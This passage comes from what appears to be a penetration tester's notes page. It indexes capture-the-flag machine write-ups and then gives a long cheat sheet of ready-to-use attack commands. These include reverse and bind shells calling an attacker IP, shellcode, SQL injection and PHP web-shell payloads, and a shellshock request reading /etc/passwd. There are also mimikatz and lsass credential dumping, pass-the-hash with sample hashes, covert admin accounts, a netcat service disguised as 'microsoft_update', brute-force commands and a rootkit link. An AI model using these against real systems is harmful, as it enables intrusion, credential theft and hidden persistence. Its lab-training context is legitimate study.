1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_sudoers"></a> #### privesc_sudoers [⇡](#privesc) being able to edit the `/etc/sudoers` file to give a user elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 5. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 7. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_tmux_rootsession"></a> #### privesc_tmux_rootsession [⇡](#privesc) --- <a name="privesc_windows_ms10_059"></a> #### privesc_windows_ms10_059 [⇡](#privesc) ```shell wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe sharehttp <targetport> certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe" pe.exe nc -nlvp 444 pe.exe <attackerip> 444 ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri --- <a name="privesc_windows_ms11_046"></a> #### privesc_windows_ms11_046 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="privesc_windows_ms14_070"></a> #### privesc_windows_ms14_070 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | --- <a name="privesc_windows_ms15_051"></a> #### privesc_windows_ms15_051 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | --- <a name="privesc_windows_ms16_032"></a> #### privesc_windows_ms16_032 [⇡](#privesc) --- <a name="privesc_windows_ms16_098"></a> #### privesc_windows_ms16_098 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | --- <a name="privesc_windows_upnphost"></a> #### privesc_windows_upnphost [⇡](#privesc) On a Windows XP system, we can modify the insecurely configured `upnphost` service to gain elevated privileges. This can be done by creating a reverse shell binary and getting it executed by restarting the vulnerable service. ```shell msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pe.exe # upload pe.exe file to the target system sudo nc -nlvp <attackerport> sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe" sc qc upnphost sc config upnphost obj= ".\LocalSystem" password= "" sc config SSDPSRV start= auto net start SSDPSRV net start upnphost ``` [+] https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html --- <a name="tips"></a> ## ⚡ Tips [↟](#contents) ### bind shell [🡑](#tips) ``` bs.c #include <sys/socket.h> #include <netinet/in.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char* argv[]) { int host_sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in host_addr; host_addr.sin_family = AF_INET; host_addr.sin_port = htons(atoi(argv[1])); host_addr.sin_addr.s_addr = INADDR_ANY; bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr)); listen(host_sock, 0); int client_sock = accept(host_sock, NULL, NULL); dup2(client_sock, 0); dup2(client_sock, 1); dup2(client_sock, 2); execve("/bin/bash", NULL, NULL); } gcc -m32 -o bs bs.c ./bs 4444 ``` ### buffer overflow [🡑](#tips) ``` payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length> pattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <attackerport> pattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <attackerport> -q <address> nasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp eax bad characters: badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") find address for "jmp esp" using mona.py: !mona jmp -r esp -b <list of bad chars> gcc compilation options: linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542 -wl,--hash-style=both: linker option to enable both gnu and sysv style hashtable support references: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md ``` ### file transfers [🡑](#tips) ``` certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\Users\user\Desktop\file.exe')" python3 -m pyftpdlib -p 21 rdesktop <targetip> -r disk:remotedisk=/usr/share/windows-binaries gzip+xxd: sender: gzip -c < file > file.gz xxd -p file.gz | tr -d '\n' && echo receiver: echo 1f8b...0000 > /tmp/file.gz.hex xxd -p -r < /tmp/file.gz.hex > /tmp/file.gz gunzip -c < /tmp/file.gz > /tmp/file automate file download via windows ftp client: echo open <targetip> >ftp_commands.txt echo anonymous >>ftp_commands.txt echo whatever >>ftp_commands.txt echo binary >>ftp_commands.txt echo get met8888.exe >>ftp_commands.txt echo bye >>ftp_commands.txt ftp -s:ftp_commands.txt create wget.vbs and download netcat: >C:\Windows\d.vbs echo strUrl = WScript.Arguments.Item(0) >>C:\Windows\d.vbs echo StrFile = WScript.Arguments.Item(1) >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >>C:\Windows\d.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>C:\Windows\d.vbs echo Err.Clear >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>C:\Windows\d.vbs echo http.Open "GET", strURL, False >>C:\Windows\d.vbs echo http.Send >>C:\Windows\d.vbs echo varByteArray = http.ResponseBody >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >>C:\Windows\d.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >>C:\Windows\d.vbs echo strData = "" >>C:\Windows\d.vbs echo strBuffer = "" >>C:\Windows\d.vbs echo For lngCounter = 0 to UBound(varByteArray) >>C:\Windows\d.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >>C:\Windows\d.vbs echo Next >>C:\Windows\d.vbs echo ts.Close >>C:\Windows\d.vbs dir C:\Windows\d.vbs C:\Windows\d.vbs "http://<targetip>/nc.exe" C:\Windows\nc.exe netcat: nc -w3 <targetip> 1234 <file.sent cmd /c nc.exe -l -v -p 1234 >file.rcvd smb (139/tcp, 445/tcp): server: python smbserver.py -smb2support shared $HOME/toolbox/scripts/shared copy ntlm/lm hashes submitted by windows clients during transfers and crack via jtr/hashcat client: list files: smbclient -L <targetip> --no-pass list files: net view \\<targetip> list files: dir \\<targetip>\shared copy files: copy \\<targetip>\shared\met8888.exe execute files: \\<targetip>\shared\met8888.exe tftp (69/udp): server: atftpd --daemon --port 69 $HOME/toolbox/scripts/shared metasploit: use auxiliary/server/tftp set TFTPROOT $HOME/toolbox/scripts/shared exploit client: download: tftp -i <targetip> GET met8888.exe upload: tftp -i <targetip> PUT hashes.txt install: pkgmgr /iu:"TFTP" ``` ### heartbleed [🡑](#tips) ``` nmap --script=ssl-heartbleed -p <targetport> <targetip> https://github.com/sensepost/heartbleed-poc python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` ### iptables [🡑](#tips) ``` config file: /etc/iptables/rules.v4 ``` ### lfi/rfi/image upload [🡑](#tips) ``` scan: uniscan -u http://<targetip>/ -qweds wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://<targetip>/FUZZ php b64 leak and command execution: php://filter/convert.base64-encode/resource=<pagename> <?php echo passthru($_GET[cmd]) ?> bypass upload filter: change extension to PHP, PHP3, PHP4, PHP5 add magic bytes to start of file (eg: GIF87 to a php shell) to evade upload filters local file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index notice urls that accept a generic filename as parameter: ?page=file1.php ?page=../../../../../../etc/passwd ?page=../../../../../../windows/system32/drivers/etc/hosts ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8): /etc/passwd /proc/self/status find home username in passwd, locate home directory for user: /var/lib/asterisk/.ssh/id_rsa ``` ### passthehash [🡑](#tips) ``` pth-toolkit: git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd xfreerdp: apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP meterpreter: meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell misc: fgdump.exe /usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 //<targetip> cmd.exe wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 administrator@localhost ``` ### passwords [🡑](#tips) ``` shadow file structure: $id$salt$password generate shadow file hash: mkpasswd -m md5 password salt mkpasswd -m sha-256 password salt mkpasswd -m sha-512 password salt ``` ### persistence [🡑](#tips) ``` add a new administrator user: net user anderson cooper /add && net localgroup administrators anderson /add add user to rdp group: net localgroup "Remote Desktop Users" anderson /add enable rdp in firewall: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable netsh firewall add portopening TCP <targetport> "RDP" enable rdp via registry (requries reboot): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f is rdp service running: tasklist /svc | findstr /c:TermService start rdp service: net start TermService permanently enable rdp service: sc config TermService start=auto code: useradd.c: #include <stdlib.h> int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } add user: #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } # compile: i686-w64-mingw32-gcc -o useradd.exe useradd.c ``` ### port forward [🡑](#tips) ``` socat: socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80 & socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 & plink: plink.exe -v -x -a -T -C -noagent -ssh -pw "<localpassword>" -R <targetport>:127.0.0.1:<targetport> <localuser>@<attackerip> meterpreter: # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # forward remote port to local address meterpreter > portfwd add --l <targetport> --p <targetport> --r <targetip> kali > rdesktop 127.0.0.1:<targetport> ``` ### portknock [🡑](#tips) ``` knock once on port <targetport>/tcp: hping3 <targetip> -S -p <targetport> -c 1 nc -vvvz <targetip> <targetport> knock on multiple tcp ports in a given sequence: hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3 <targetip> -S -p 8890 -c 1 nmap -Pn -sT -r -p666,7000,8890 <targetip> ``` ### restricted shells [🡑](#tips) ``` rbash: bash -i BASH_CMDS[foobar]=/bin/bash;foobar lshell: echo os.system("/bin/bash") ``` ### reverse shell [🡑](#tips) ``` reverse tcp shell from bash: /bin/bash -i >& /dev/tcp/<targetip>/<attackerport> 0>&1 make a partially interactive terminal usable: target: python -c "import pty; pty.spawn('/bin/bash')" local: stty raw -echo ; fg target: reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45 -columns 90 ; stty size reverse php shell on windows: https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php ``` ### shellcode [🡑](#tips) ``` /bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ``` ### shellshock [🡑](#tips) ``` look for /cgi-bin/ directory (incldue 403 code for gobuster scan) check for scripts (-x sh,pl) using gobuster test http header, user-agent probably curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl,py nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` ### sql injection [🡑](#tips) ``` manual verification: ' or 1=1 -- - ' || 1=1 # or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 find a row where you can place your output: http://<targetip>/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 get db version: http://<targetip>/inj.php?id=1 union all select 1,2,3,@@version,5 get current user: http://<targetip>/inj.php?id=1 union all select 1,2,3,user(),5 see all tables: http://<targetip>/inj.php?id=1 union all select 1,2,3,table_name,5 from information_schema.tables get column names for a specified table: http://<targetip>/inj.php?id=1 union all select 1,2,3,column_name,5 from information_schema.columns where table_name='users' concat user names and passwords: http://<targetip>/inj.php?id=1 union all select 1,2,3,concat(name, 0x3a , password),5 from users write to a file: http://<targetip>/inj.php?id=1 union all select 1,2,3,"content",5 into outfile 'outfile' ``` ### startup scripts [🡑](#tips) ``` chmod +x /foo/bar update-rc.d /foo/bar defaults ``` ### stegnography [🡑](#tips) ``` strings exiftool steghide ``` ### tmux shortcuts [🡑](#tips) ``` prefix: ctrl + b toggle logging: prefix + shift + p screen cap: prefix + alt + p complete history: prefix + alt + shift + p ``` ### tunneling [🡑](#tips) ``` connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service on localhost, run a local standalone daemon on <targetport>: proxytunnel -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234 ssh [email protected] /bin/bash vim /etc/proxychains.conf http <targetip> <targetport> proxychains nmap -sT -p22 <targetip> proxychains ssh <username>@<targetip> /bin/bash forward remote port to local address: plink.exe -P 22 -l root -pw "<password>" -R 445:127.0.0.1:445 <targetip> ``` ### windows useful commands [🡑](#tips) ``` net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport> -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv <targetip> <targetport> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` <a name="tools"></a> ## 💥 Tools [↟](#contents) ### burp [🡑](#tools) ``` set an upstream proxy within burp: burp > user options > upstream proxy > <targetip>:<targetport> ``` ### cewl [🡑](#tools) ``` cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null ``` ### fcrackzip [🡑](#tools) ``` fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip> unzip -o -P "password" <file.zip> ``` ### gobuster [🡑](#tools) ``` start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist search file extension: gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php gobuster dir -u http://<targetip>:<targetport>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" quick: gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux full/comprehensive: gobuster -s 200,204,301,302,307,403 -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' ippsec: gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,403 -k -x txt,php,asp gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl cgi list: /usr/share/seclists/Discovery/Web-Content/CGIs.txt ``` ### hashcat [🡑](#tools) ``` hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt ``` ### hydra [🡑](#tools) ``` generic: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> ftp: hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ftp http: hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V with cookie: hydra -l user -P /usr/share/wordlists/rockyou.txt <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie: insert stuff here' pop3: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> pop3 rdp: hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<targetip> smtp: hydra -s 25 -v -V -l [email protected] -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <targetip> smtp ssh: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword <targetip> ssh wordpress: hydra -l elliot -P ./fsocity.dic <targetip> http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR" ``` ### john [🡑](#tools) ``` create custom wordlist: john --wordlist=megacorpone-cewl --rules --stdout >megacorpone-cewl-jtr crack shadow hashes: unshadow passwd shadow >unshadowed ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john --show unshadowed crack md5 hashes: john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes ``` ### kernel module [🡑](#tools) ``` rootkit: https://github.com/PinkP4nther/Pinkit ``` ### merlin c2 framework [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>" -o merlinagentx64.exe main.go go build -o merlinagent.elf main.go ``` ### metasploit [🡑](#tools) ``` db_status load mimiktaz msfconsole -q msfdb init msfdb start search <string> set payload windows/x86/meterpreter/reverse_tcp set verbose true show advanced show options show payloads show targets systemctl start postgresql systemctl status postgresql wdigest ``` ### msfvenom [🡑](#tools) ``` linux bind tcp shellcode: msfvenom -p linux/x86/shell_bind_tcp lport=4444 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai windows reverse tcp shellcode: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -b "\x00\x0a\x0d" -f c -a x86 --platform windows -e x86/shikata_ga_nai revere tcp shellcode for client-side exploit without any encoder: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -f js_le --platform windows -a x86 -e generic/none php reverse meterpreter: msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f raw -o shell.php php reverse shell: msfvenom -p php/reverse_php LHOST=<targetip> LPORT=80 -f raw 